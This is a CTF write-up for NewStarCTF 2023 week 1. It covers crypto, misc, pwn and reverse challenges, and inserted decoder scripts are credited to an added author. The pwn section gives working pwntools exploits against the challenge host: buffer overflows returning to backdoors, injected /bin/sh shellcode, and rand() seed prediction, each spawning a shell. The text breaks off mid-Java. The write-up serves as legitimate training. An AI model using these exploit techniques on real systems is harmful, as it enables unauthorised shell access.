[NewStarCTF 2023 Public Track] week1

There have been no formal competitions lately, only beginner contests: moectf, newstar, SHCTF and 0xGame are all long-running events that release one batch of challenges per week.

Week 1 of newstar ended this week. Reportedly there was a lot of py (flag sharing), and week 2 has been postponed with no fixed start date yet. Since week 1 submissions are closed, I can post the write-ups here for the record. Overall there were no hard challenges.

Crypto

brainfuck

```brainfuck
++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++.
```

Decode it directly on the site Brainfuck/OoK加密解密 - Bugku CTF.

flag{Oiiaioooooiai#b7c0b1866fe58e12}

Caesar's Secert

kqfl{hf3x4w'x_h1umjw_n5_a4wd_3fed}

One-click decryption with the 随波逐流 tool.

key1 #5: flag{ca3s4rs_c1pher_i5_v4ry_3azy}

Fence

fa{ereigtepanet6680}lgrodrn_h_litx#8fc3

Same tool (随波逐流), W-type rail fence.

flag{reordering_the_plaintext#686f8c03}

Vigenère

pqcq{qc_m1kt4_njn_5slp0b_lkyacx_gcdy1ud4_g3nv5x0}

Try keys one letter at a time so that the header becomes flag; you can also read the key letters off the Vigenère table.

flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}
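To show what the online tools above are doing, here are decoders for the three classical ciphers in this block (Caesar, the 2-rail W-type rail fence, and Vigenère) as an added example; this code is mine, not from the write-up or the challenge authors. The ciphertexts are the ones quoted above; the function names and the crib-based key recovery (which assumes the plaintext starts with flag{ and takes the shortest key period consistent with that crib) are my additions. Note that the Caesar decoder shifts only letters, so the apostrophe in the ciphertext passes through unchanged.

```python
# Added example (not from the original write-up). Ciphertexts are the three
# challenge strings quoted above; function names and the crib heuristic are mine.
CAESAR_CT = "kqfl{hf3x4w'x_h1umjw_n5_a4wd_3fed}"
FENCE_CT = "fa{ereigtepanet6680}lgrodrn_h_litx#8fc3"
VIGENERE_CT = "pqcq{qc_m1kt4_njn_5slp0b_lkyacx_gcdy1ud4_g3nv5x0}"


def shift_letter(ch, shift):
    """Shift one ASCII letter backwards; digits and punctuation pass through."""
    if "a" <= ch <= "z":
        return chr((ord(ch) - ord("a") - shift) % 26 + ord("a"))
    if "A" <= ch <= "Z":
        return chr((ord(ch) - ord("A") - shift) % 26 + ord("A"))
    return ch


def caesar_decrypt(ct, shift):
    return "".join(shift_letter(ch, shift) for ch in ct)


def caesar_bruteforce(ct, crib="flag{"):
    """Try all 26 shifts; return (shift, plaintext) for the first one starting with the crib."""
    for shift in range(26):
        pt = caesar_decrypt(ct, shift)
        if pt.startswith(crib):
            return shift, pt
    return None


def rail_fence_decrypt(ct, rails):
    """Generic zigzag (W-type) rail fence: rebuild the rail index of every position,
    fill the positions rail by rail from the ciphertext, then read back in order."""
    if rails < 2:
        return ct
    pattern, rail, step = [], 0, 1
    for _ in range(len(ct)):
        pattern.append(rail)
        if rail == 0:
            step = 1
        elif rail == rails - 1:
            step = -1
        rail += step
    # Stable sort groups positions by rail while keeping left-to-right order.
    order = sorted(range(len(ct)), key=lambda i: pattern[i])
    pt = [""] * len(ct)
    for cipher_index, pos in enumerate(order):
        pt[pos] = ct[cipher_index]
    return "".join(pt)


def vigenere_decrypt(ct, key):
    """Letters consume key positions; non-letters are copied without advancing the key."""
    out, k = [], 0
    for ch in ct:
        if ch.isalpha():
            out.append(shift_letter(ch, ord(key[k % len(key)]) - ord("a")))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def recover_vigenere_key(ct, crib="flag{"):
    """Derive the key letters covered by a known plaintext prefix, then take the
    shortest period consistent with them (a heuristic: confirm by decrypting)."""
    shifts = []
    for c, p in zip(ct, crib):
        if p.isalpha():
            shifts.append((ord(c.lower()) - ord(p.lower())) % 26)
    for period in range(1, len(shifts) + 1):
        if all(shifts[i] == shifts[i % period] for i in range(len(shifts))):
            return "".join(chr(ord("a") + s) for s in shifts[:period])
    return ""


if __name__ == "__main__":
    print(caesar_bruteforce(CAESAR_CT))
    print(rail_fence_decrypt(FENCE_CT, 2))
    key = recover_vigenere_key(VIGENERE_CT)
    print(key, vigenere_decrypt(VIGENERE_CT, key))
```

With the crib flag{ the four letters f, l, a, g give shifts 10, 5, 2, 10, so the shortest consistent period is 3 and the key is kfc; decrypting with it reproduces the flag above.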

babyencoding

The flag consists of 3 parts: part 1 is base64, part 2 is base32, and part 3 is uuencode.

part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=

part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=

part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`

This uuencode part, however, has to be decoded on 在线UUencode编码|在线UUencode解码|UU编码|UU解码|UUencode编码原理介绍--查错网; on 随波逐流 the tail comes out garbled.

flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}
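The three-part decoding as an added example (my code, not from the write-up): base64 and base32 come from the standard library, and the uuencode line is decoded both with binascii.a2b_uu and by hand so the length character and the 6-bit groups are visible. The inputs are the three parts printed above.

```python
import base64
import binascii

# The three encoded parts exactly as printed by the challenge (quoted above).
PART1_B64 = "ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ="
PART2_B32 = "MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY="
PART3_UU = "=8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`"


def uudecode_line_manual(line):
    """Decode one uuencoded data line by hand: the first character carries the byte
    count ((ord(c) - 32) & 63); every following character carries 6 bits of data.
    A trailing '`' encodes zero bits and is just padding."""
    count = (ord(line[0]) - 32) & 63
    bits = "".join(format((ord(c) - 32) & 63, "06b") for c in line[1:])
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))
    return data[:count]


def decode_uu_line(line):
    """Same thing via the standard library (binascii handles the length byte)."""
    return binascii.a2b_uu(line.encode())


def decode_parts(part1, part2, part3):
    """Assemble the flag from its base64, base32 and uuencode pieces."""
    return (base64.b64decode(part1)
            + base64.b32decode(part2)
            + decode_uu_line(part3))


if __name__ == "__main__":
    print(uudecode_line_manual(PART3_UU))
    print(decode_parts(PART1_B64, PART2_B32, PART3_UU))
```

The manual decoder is why the tail of part 3 matters: the line says 29 bytes, so the last six bits contributed by the final '`' are discarded rather than turned into a stray byte.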

babyrsa

n is a product of a pile of small primes and can be factored directly.

```python
from Crypto.Util.number import *
from flag import flag

def gen_prime(n):
    res = 1

    for i in range(15):
        res *= getPrime(n)

    return res


if __name__ == '__main__':
    n = gen_prime(32)
    e = 65537
    m = bytes_to_long(flag)
    c = pow(m,e,n)
    print(n)
    print(c)

# challenge output:
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
```

Get phi directly in Sage:

```python
# Sage session: euler_phi() factors n itself and returns phi(n).
from Crypto.Util.number import long_to_bytes as l2b
phi = euler_phi(n)
d = inverse_mod(0x10001, phi)
m = pow(c, d, n)
l2b(int(m))
# b'flag{us4_s1ge_t0_cal_phI}'
```
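For readers without Sage, here is the same attack in plain Python as an added example (my code, not from the write-up): Brent's variant of Pollard's rho peels off the 32-bit factors, phi(n) is built from the full factorization (repeated primes handled), and the flag is decrypted. Miller-Rabin with random bases is used for the primality checks. n, e and c are the challenge values above; expect a few seconds of runtime.

```python
import random
from math import gcd

# Challenge values from the write-up above (n is a product of fifteen 32-bit primes).
N = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
C = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
E = 65537


def is_probable_prime(n, rounds=20):
    """Miller-Rabin with random bases; more than enough for 32-bit cofactors."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def pollard_rho_brent(n):
    """Return a non-trivial factor of composite n (Brent's cycle finding, batched gcds)."""
    if n % 2 == 0:
        return 2
    while True:
        y, c, m = random.randrange(1, n), random.randrange(1, n), 128
        g = r = q = 1
        x = ys = y
        while g == 1:
            x = y
            for _ in range(r):
                y = (y * y + c) % n
            k = 0
            while k < r and g == 1:
                ys = y
                for _ in range(min(m, r - k)):
                    y = (y * y + c) % n
                    q = q * abs(x - y) % n
                g = gcd(q, n)
                k += m
            r *= 2
        if g == n:
            # The batched product overshot a factor; back up one step at a time.
            g = 1
            while g == 1:
                ys = (ys * ys + c) % n
                g = gcd(abs(x - ys), n)
        if g != n:
            return g


def factorize(n):
    """Full factorization as {prime: multiplicity}."""
    factors, stack = {}, [n]
    while stack:
        x = stack.pop()
        if x == 1:
            continue
        if is_probable_prime(x):
            factors[x] = factors.get(x, 0) + 1
            continue
        f = pollard_rho_brent(x)
        stack += [f, x // f]
    return factors


def euler_phi(factors):
    """phi(n) = prod p^(k-1) * (p-1) over the factorization."""
    phi = 1
    for p, k in factors.items():
        phi *= (p - 1) * p ** (k - 1)
    return phi


def rsa_decrypt(n, e, c, factors=None):
    """Textbook RSA decryption once n is factored."""
    factors = factors if factors is not None else factorize(n)
    d = pow(e, -1, euler_phi(factors))
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    fs = factorize(N)
    print(sorted(fs))
    print(rsa_decrypt(N, E, C, fs))
```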

Small d

d is small, so just use Wiener's attack.

```python
from secret import flag
from Crypto.Util.number import *

p = getPrime(1024)
q = getPrime(1024)

d = getPrime(32)
e = inverse(d, (p-1)*(q-1))
n = p*q
m = bytes_to_long(flag)

c = pow(m,e,n)

print(c)
print(e)
print(n)

# challenge output:
c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
```
```python
# Runs in plain Python as well as Sage; c, e and n are the challenge values above.
from Crypto.Util.number import long_to_bytes,bytes_to_long

def transform(x,y):
    # partial quotients of the continued fraction of x/y
    res = []
    while y:
        res.append(x//y)
        x,y = y,x%y
    return res

def continued_fraction(res):
    # (numerator, denominator) of the convergent built from the quotients in res
    numerator,denominator = 1,0
    for i in res[::-1]:
        denominator,numerator = numerator,i*numerator+denominator
    return numerator,denominator

def wiener_attack(c,res,n):
    print("Attack start...")
    for i in range(1,len(res)):
        ress = res[:i]
        d = continued_fraction(ress)[1]   # candidate private exponent
        m = long_to_bytes(int(pow(c,d,n)))
        #if all(0x20<=k<=0x7f for k in m):
        if b'flag{' in m:
            print(m)
            break

res = transform(e,n)
wiener_attack(c,res,n)

#Attack start...
#b'flag{learn_some_continued_fraction_technique#dc16885c}'
```
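The script above tries each convergent's denominator by trial decryption. A stricter check, as an added example (my code, not the write-up's): for each convergent k/d of e/n, compute the implied phi = (e*d - 1)/k and test whether p + q = n - phi + 1 gives integer roots with p*q = n. This recovers p and q as well as d, and it is how you would audit a public key for a small private exponent without any ciphertext at all. The constants are the challenge's e, n and c above.

```python
from math import isqrt

# Challenge values from the write-up above.
E = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
N = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
C = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248


def continued_fraction_expansion(num, den):
    """Partial quotients of num/den (the same list transform() above builds)."""
    terms = []
    while den:
        q, r = divmod(num, den)
        terms.append(q)
        num, den = den, r
    return terms


def convergents(terms):
    """Successive convergents h/k of the expansion via the standard recurrence."""
    h_prev2, h_prev1, k_prev2, k_prev1 = 0, 1, 1, 0
    for a in terms:
        h = a * h_prev1 + h_prev2
        k = a * k_prev1 + k_prev2
        yield h, k
        h_prev2, h_prev1 = h_prev1, h
        k_prev2, k_prev1 = k_prev1, k


def wiener_recover(e, n):
    """Return (d, p, q) if some convergent k/d of e/n satisfies e*d - 1 = k*phi(n)
    and the implied phi factors n; None if the key is not Wiener-weak."""
    for k, d in convergents(continued_fraction_expansion(e, n)):
        if k == 0 or (e * d - 1) % k:
            continue
        phi = (e * d - 1) // k
        s = n - phi + 1              # p + q
        disc = s * s - 4 * n         # (p - q)^2
        if disc < 0:
            continue
        r = isqrt(disc)
        if r * r != disc:
            continue
        p, q = (s + r) // 2, (s - r) // 2
        if p * q == n:
            return d, p, q
    return None


def decrypt_with(d, n, c):
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    d, p, q = wiener_recover(E, N)
    print(d.bit_length(), p * q == N)
    print(decrypt_with(d, N, C))
```

Because the test is purely arithmetic (a perfect-square discriminant and p*q == n), it cannot be fooled by a ciphertext that happens to decrypt to printable bytes, and it stops on the first convergent that works.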

babyxor

Single-byte XOR encryption; just brute-force it.

```python
from secret import *

ciphertext = []

for f in flag:
    ciphertext.append(f ^ key)

print(bytes(ciphertext).hex())
# e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2
```
```python
enc = bytes.fromhex('e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2')
for i in range(256):          # try every possible key byte
    tmp = bytes([i^v for v in enc])
    if b'flag' in tmp:
        print(tmp)

#flag{x0r_15_symm3try_and_e4zy!!!!!!}
```

Affine

Affine cipher.

```python
from flag import flag, key

modulus = 256

ciphertext = []

for f in flag:
    ciphertext.append((key[0]*f + key[1]) % modulus)

print(bytes(ciphertext).hex())

# dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064
```

Since both key values are small, they can be brute-forced directly from the flag{ header.

```python
enc = bytes.fromhex('dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064')
for i in range(256):
    for j in range(256):
        if bytes([(i*v+j)%256 for v in b'flag{']) == enc[:5]:
            print(i,j)

a,b = 17,23
flag = ''
for i in range(len(enc)):
    for k in range(0x21,0x7f):
        if (a*k + b)%256 == enc[i]:
            flag += chr(k)
            break

print(flag)
#flag{4ff1ne_c1pher_i5_very_3azy}
```
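Instead of searching all 65536 (a, b) pairs, the key can be solved algebraically from the flag{ crib, as an added example (my code, not from the write-up): pick two crib positions whose plaintext difference is odd (so it is invertible mod 256), solve for a and b, verify against the whole crib, then decrypt every byte with the modular inverse of a. The ciphertext is the one above; the function names are mine.

```python
# Ciphertext from the write-up above.
ENC = bytes.fromhex("dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064")


def solve_affine_key(ct, crib=b"flag{", modulus=256):
    """Solve c = a*p + b (mod modulus) from a known-plaintext prefix.
    Two crib positions i, j give a = (c_j - c_i) * (p_j - p_i)^-1; the
    difference must be invertible (odd for a power-of-two modulus)."""
    for i in range(len(crib)):
        for j in range(i + 1, len(crib)):
            diff = (crib[j] - crib[i]) % modulus
            if diff % 2 == 0:          # even difference: no inverse mod 2^k
                continue
            a = ((ct[j] - ct[i]) * pow(diff, -1, modulus)) % modulus
            if a % 2 == 0:             # a itself must be invertible to decrypt
                continue
            b = (ct[i] - a * crib[i]) % modulus
            # Accept only if the candidate explains the whole crib.
            if all((a * p + b) % modulus == c for p, c in zip(crib, ct)):
                return a, b
    return None


def affine_decrypt(ct, a, b, modulus=256):
    """p = a^-1 * (c - b) (mod modulus) for every byte."""
    a_inv = pow(a, -1, modulus)
    return bytes((a_inv * (c - b)) % modulus for c in ct)


if __name__ == "__main__":
    a, b = solve_affine_key(ENC)
    print(a, b)
    print(affine_decrypt(ENC, a, b))
```

For this ciphertext the first usable pair is 'f' and 'a' (difference -5, which is odd); 'f' and 'l' differ by 6 and are skipped. a = 17 has inverse 241 mod 256 (17 * 241 = 4097), which is what affine_decrypt uses.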

babyaes

```python
from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *

def pad(data):
    return data + b"".join([b'\x00' for _ in range(0, 16 - len(data))])

def main():
    flag_ = pad(flag)
    key = os.urandom(16) * 2
    iv = os.urandom(16)
    print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
    aes = AES.new(key, AES.MODE_CBC, iv)
    enc_flag = aes.encrypt(flag_)
    print(enc_flag)

if __name__ == "__main__":
    main()
```

The key is 16*2 bytes while the iv is only 16 bytes, so the upper half of the hint exposes the first half of the key; from that we recover the key and the iv and decrypt directly.

```python
from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes, bytes_to_long

hint = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
# hint ^ 1 == key ^ iv; the iv only covers the low 16 bytes, so the high 16 bytes
# are the first half of the key (fixed width of 32 so a leading zero byte cannot shift it)
key = long_to_bytes(hint ^ 1, 32)[:16] * 2
iv = long_to_bytes(hint ^ 1 ^ bytes_to_long(key), 16)

aes = AES.new(key, AES.MODE_CBC, iv)
print(aes.decrypt(enc))
#b'firsT_cry_Aes\x00\x00\x00'
#flag{firsT_cry_Aes}
```

MISC

CyberChef's Secret

I suspect this one wandered over from crypto.

M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA=

Just hand it to CyberChef.

Confidential image

The image is a QR code, which is obviously not the flag; use StegSolve.

Traffic! Shark!

A packet-capture challenge. Open it in Wireshark; there are lots of HTTP requests. Sort by protocol to find the suspicious entry.

Follow the HTTP stream to get the ciphertext:

Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=

Into CyberChef, click the magic wand twice.

Zip archives

Open the attachment in 010 Editor: it is a zip file missing its header. Change the header to 504b0304; there is a base64 hint at the tail.

The decoded hint is:

I like six-digit numbers because they are very concise and easy to remember.

So the password is 6 digits. Brute-forcing 6 digits throws an error, which means the archive's encryption flag is wrong; fix it in 010 by changing the 0 to 0.

Then brute-force the password to get the flag.

Whitespace

The archive contains a blank file made of spaces and tabs. Replace spaces with 0 and tabs with 1 and take only the last 8 characters of each line (there is also a stray 1 inserted in the middle; not sure where it comes from).

```python
# space -> 0, tab -> 1; the last 8 bits of each line are one character
a = open('white.txt').readlines()
flag = ''
for v in a:
    v = v[:-1].replace(' ', '0').replace('\t', '1')   # drop the newline, then map
    flag += chr(int(v[-8:],2))

print(flag.replace(chr(1),''))   # strip the stray \x01 characters
```

Hidden eyes

Obviously, as soon as eyes are mentioned it is SilentEye.

PWN

ret2text

read has an overflow; just return into the backdoor.

```python
from pwn import *

p = remote('node4.buuoj.cn',29584)
context.log_level = 'debug'

p.sendlineafter(b"Show me your magic", b'\x00'*0x28 + p64(0x4011fb))
print(p.sendline(b'cat flag'))
p.interactive()
```

ezshellcode

It allocates a writable and executable region, reads the shellcode into it and executes it.

```python
from pwn import *

p = remote('node4.buuoj.cn',29612)
context(arch='amd64', log_level = 'debug')

p.sendlineafter(b"Show me your magic", asm(shellcraft.sh()))
print(p.sendline(b'cat flag'))
p.interactive()
```

newstar shop

This one is mainly about reading the code.

You start with 100 dollars: buy the gift for 40 twice, then run option 3, which subtracts 50 and makes the balance negative; after that buy the flag.

Input: 1,2,1,2,3,1,3

```cpp
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  init();
  while ( 1 )
  {
    menu();
    if ( (int)__isoc99_scanf("%d", &v3) <= 0 )
      puts("Invalid input");
    switch ( v3 )
    {
      case 1:
        shop();
        break;
      case 2:
        makemoney();
        break;
      case 3:
        dont_try();
        break;
      default:
        puts("nothing here");
        puts("\n");
        break;
    }
  }
}
unsigned __int64 shop()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("=============================");
  puts("===Welcome to newstar shop===");
  puts("=============================");
  puts("1.newstar's gift          20$");
  puts("2.pwn write up            40$");
  puts("3.shell                 9999$");
  puts("\n");
  puts("All things are only available for one day!");
  puts("What do you want to buy?");
  puts("\n");
  if ( (int)__isoc99_scanf("%d", &v1) <= 0 )
    puts("Invalid input");
  if ( v1 != 3 )
  {
    if ( v1 > 3 )
    {
LABEL_17:
      puts("nothing here");
      puts("\n");
      return v2 - __readfsqword(0x28u);
    }
    if ( v1 == 1 )
    {
      if ( (unsigned int)money > 0x13 )
      {
        money -= 20;
        puts("You buy a newstar's gift");
        puts("That is the gift:");
        puts("What will happen when int transfer to unsigned int?");
        goto LABEL_10;
      }
    }
    else
    {
      if ( v1 != 2 )
        goto LABEL_17;
      if ( (unsigned int)money > 0x27 )
      {
        money -= 40;
        puts("You buy a pwn write up");
        puts("That is free after the match,haha");
        goto LABEL_10;
      }
    }
    puts("Sorry,you don't have enough money");
LABEL_10:
    puts("\n");
    return v2 - __readfsqword(0x28u);
  }
  if ( (unsigned int)money > 0x270E )
  {
    money = 0;
    puts("How do you buy it?");
    puts("\n");
    system("/bin/sh");
  }
  else
  {
    puts("Sorry,you don't have enough money");
    puts("\n");
  }
  return v2 - __readfsqword(0x28u);
}
```

p1eee

Similar to the first challenge: read has an overflow and there is a backdoor, but the backdoor address is not given directly.

```cpp
ssize_t sub_120E()
{
  __int64 buf[4]; // [rsp+0h] [rbp-20h] BYREF

  memset(buf, 0, sizeof(buf));
  puts("A nice try to break pie!!!");
  return read(0, buf, 0x29uLL);
}
```

Backdoor:

```python
from pwn import *

p = remote('node4.buuoj.cn',25970)
context(arch='amd64', log_level = 'debug')

p.sendafter(b"A nice try to break pie!!!", b'\x00'*0x28 + p8(0x6c))
print(p.sendline(b'cat flag'))
p.interactive()
```

Random

Guess one number correctly and that is it.

```cpp
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v3; // bl
  int v4; // eax
  int v6; // [rsp+4h] [rbp-2Ch] BYREF
  unsigned int seed; // [rsp+8h] [rbp-28h]
  int v8; // [rsp+Ch] [rbp-24h]
  _BYTE v9[5]; // [rsp+13h] [rbp-1Dh] BYREF
  unsigned __int64 v10; // [rsp+18h] [rbp-18h]

  v10 = __readfsqword(0x28u);
  init(argc, argv, envp);
  seed = time(0LL);
  srand(seed);
  v8 = rand();
  puts("can you guess the number?");
  __isoc99_scanf("%d", &v6);
  if ( v8 == v6 )
  {
    qmemcpy(v9, "2$031", sizeof(v9));
    v3 = v9[rand() % 5];
    v4 = rand();
    sy(v9[v4 % 2], v3);
  }
  else
  {
    printf("%s", "Haha you are wrong");
  }
  return 0;
}
```

Use the ctypes library to reproduce the number.

```python
from ctypes import *
from pwn import *

clibc = cdll.LoadLibrary("/home/kali/glibc/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")

p = remote('node4.buuoj.cn',26584)
context(arch='amd64', log_level = 'debug')


clibc.srand(clibc.time(0))
v =clibc.rand()

p.sendlineafter(b"can you guess the number?", str(v).encode())

p.sendline(b'/bin/sh')
p.sendline(b'cat flag')

p.interactive()
```

REVERSE

easy_RE

Half of it is visible as soon as IDA opens.

Decompiling shows the other half.

The encryption is just adding 1.

```python
a = b'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
bytes([v-1 for v in a])
# b'flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}'
```

Segments

As the challenge name says, look at the segments.

ELF

The second step is base64.

```cpp
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // edx
  char *s1; // [rsp+0h] [rbp-20h]
  char *v6; // [rsp+8h] [rbp-18h]
  char *s; // [rsp+10h] [rbp-10h]

  s = (char *)malloc(0x64uLL);
  printf("Input flag: ");
  fgets(s, 100, stdin);
  s[strcspn(s, "\n")] = 0;
  v6 = encode(s);
  v3 = strlen(v6);
  s1 = base64_encode((__int64)v6, v3);
  if ( !strcmp(s1, "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t") )
    puts("Correct");
  else
    puts("Wrong");
  free(v6);
  free(s1);
  free(s);
  return 0;
}
```

Step 1, encode, XORs each byte with 0x20 and then adds 16.

```cpp
_BYTE *__fastcall encode(const char *a1)
{
  size_t v1; // rax
  int v2; // eax
  _BYTE *v4; // [rsp+20h] [rbp-20h]
  int i; // [rsp+28h] [rbp-18h]
  int v6; // [rsp+2Ch] [rbp-14h]

  v1 = strlen(a1);
  v4 = malloc(2 * v1 + 1);
  v6 = 0;
  for ( i = 0; i < strlen(a1); ++i )
  {
    v2 = v6++;
    v4[v2] = (a1[i] ^ 0x20) + 16;
  }
  v4[v6] = 0;
  return v4;
}
```
```python
from base64 import b64decode

a = "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t"
b = b64decode(a)
bytes([(v-16)^0x20 for v in b])   # undo the +16 first, then the XOR 0x20
# b'flag{D0_4ou_7now_wha7_ELF_1s?}'
```

Endian

This is about big-endian versus little-endian.

```cpp
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+4h] [rbp-3Ch]
  char *v5; // [rsp+8h] [rbp-38h]
  char v6[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v7; // [rsp+38h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  puts("please input your flag");
  __isoc99_scanf("%s", v6);
  v5 = v6;
  for ( i = 0; i <= 4; ++i )
  {
    if ( *(_DWORD *)v5 != (array[i] ^ 0x12345678) )
    {
      printf("wrong!");
      exit(0);
    }
    v5 += 4;
  }
  printf("you are right");
  return 0;
}
```

The encryption is just a XOR.

```python
from Crypto.Util.number import long_to_bytes
from pwn import p32

enc = [0x75553A1E, 0x7B583A03, 0x4D58220C, 0x7B50383D, 0x736B3819]
a = [0x12345678 ^ v for v in enc]
# [1734437990, 1768713339, 1600943220, 1768189509, 1633644129]

long_to_bytes(a[0])            # big-endian view of the first dword: b'galf'
b''.join(p32(v) for v in a)    # little-endian packing, as stored in memory:
# b'flag{llittl_Endian_a'
```

AndroXor

Open it with jadx; the ciphertext and the (XOR) key are right there.

```java
public class MainActivity extends AppCompatActivity {
    private ActivityMainBinding binding;

    static {
        System.loadLibrary("androxor");
    }

    public String Xor(String str, String str2) {
        char[] cArr = {14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r'};
        char[] cArr2 = new char[str.length()];
        String str3 = str.length() != 25 ? "wrong!!!" : "you win!!!";
        for (int i = 0; i < str.length(); i++) {
            char charAt = (char) (str.charAt(i) ^ str2.charAt(i % str2.length()));
